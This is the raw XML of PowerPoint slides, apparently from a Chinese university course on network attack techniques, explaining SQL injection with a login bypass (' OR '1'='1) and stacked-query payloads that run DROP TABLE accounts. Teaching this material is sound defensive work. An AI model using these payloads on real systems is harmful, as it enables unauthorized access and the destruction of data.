          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8397750" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>表示层：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表单或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输入参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>业务逻辑层：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过用户输入参数构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不完善的输入验证机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据层：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过数据连接执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>触发恶意数据库操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3860475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188640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击原理解析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1484784"/>
            <a:ext cx="8001000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表示层：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表单</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>业务逻辑层：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>login.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据层：后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MS SQL Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68CB32A-FA45-4BF5-AFF8-B32CF8C18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66" y="3068960"/>
            <a:ext cx="9914723" cy="3312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581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260648"/>
            <a:ext cx="8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击原理解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>正常情况</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用户名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>guojing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>；口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SELECT * from FROM accounts WHERE username ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>guojing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = '123456'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>黄蓉的诡计”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>口令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>huangrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' OR '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SELECT * from FROM accounts WHERE username ='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>huangrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR '1'='1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>huangrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR '1'='1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等价于：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SELECT * from FROM accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后果：绕过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>login.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用户身份认证的正常逻辑，获得访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000"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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251400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88640"/>
            <a:ext cx="8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击原理解析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>黄蓉的诡计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>口令框输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>huangrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>‘; DROP TABLE accounts; SELECT * FROM admin WHERE 't' ='t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="471487" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SELECT * from FROM accounts WHERE username =‘x’ OR ‘1’=‘1’ AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>huangrong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471487" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP TABLE accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471487" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM admin WHERE 't' = 't'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>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dirty="0"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2648796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332656"/>
            <a:ext cx="8001000" cy="459904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型约束检查不完备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>statement := "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE id = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + ";"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>黄蓉的诡计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> := </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1; DROP TABLE accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE id = 1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP TABLE accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{519535F7-5351-E14C-A73A-194DEFCD5AC9}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B8FF433E-49B7-5347-8F80-BD7A2435EC20}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264695201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13295</TotalTime>
  <Words>2192</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>310</Paragraphs>
  <Slides>31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黑体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Profile</vt:lpstr>
      <vt:lpstr>电子科技大学 网络与系统攻击技术课程</vt:lpstr>
      <vt:lpstr>内容</vt:lpstr>
      <vt:lpstr>代码注入攻击</vt:lpstr>
      <vt:lpstr>SQL注入攻击 (SQL Injection)</vt:lpstr>
      <vt:lpstr>SQL注入攻击原理</vt:lpstr>
      <vt:lpstr>SQL注入攻击原理解析</vt:lpstr>
      <vt:lpstr>SQL注入攻击原理解析(2)</vt:lpstr>
      <vt:lpstr>SQL注入攻击原理解析(3)</vt:lpstr>
      <vt:lpstr>类型约束检查不完备SQL注入</vt:lpstr>
      <vt:lpstr>实际SQL注入攻击步骤</vt:lpstr>
      <vt:lpstr>发现SQL注入点</vt:lpstr>
      <vt:lpstr>判断后台数据库类型 </vt:lpstr>
      <vt:lpstr>利用SQL注入进行后台口令拆解</vt:lpstr>
      <vt:lpstr>上传ASP后门，得到默认账户权限 </vt:lpstr>
      <vt:lpstr>本地特权提升与利用数据库扩展存储过程</vt:lpstr>
      <vt:lpstr>自动化SQL注入攻击工具</vt:lpstr>
      <vt:lpstr>HDSI自动注入工具</vt:lpstr>
      <vt:lpstr>HDSI自动注入工具(2)</vt:lpstr>
      <vt:lpstr>SQL注入攻击防范措施</vt:lpstr>
      <vt:lpstr>内容</vt:lpstr>
      <vt:lpstr>跨站脚本攻击 (XSS: Cross-Site Scripting)</vt:lpstr>
      <vt:lpstr>跨站脚本攻击技术原理</vt:lpstr>
      <vt:lpstr>典型跨站脚本攻击</vt:lpstr>
      <vt:lpstr>跨站脚本攻击类型</vt:lpstr>
      <vt:lpstr>非持久性XSS攻击过程</vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实例</vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实例 －测试XSS漏洞 </vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实例 －窃取用户的会话Cookie  </vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实例 －假冒其他用户修改帖子  </vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击实例 －编写XSS蠕虫  </vt:lpstr>
      <vt:lpstr>XSS跨站脚本攻击防范措施</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>computer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Administrator</cp:lastModifiedBy>
  <cp:revision>6418</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-06-29T02:16:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-24T03:41:01Z</dcterms:modified>
</cp:coreProperties>
</file>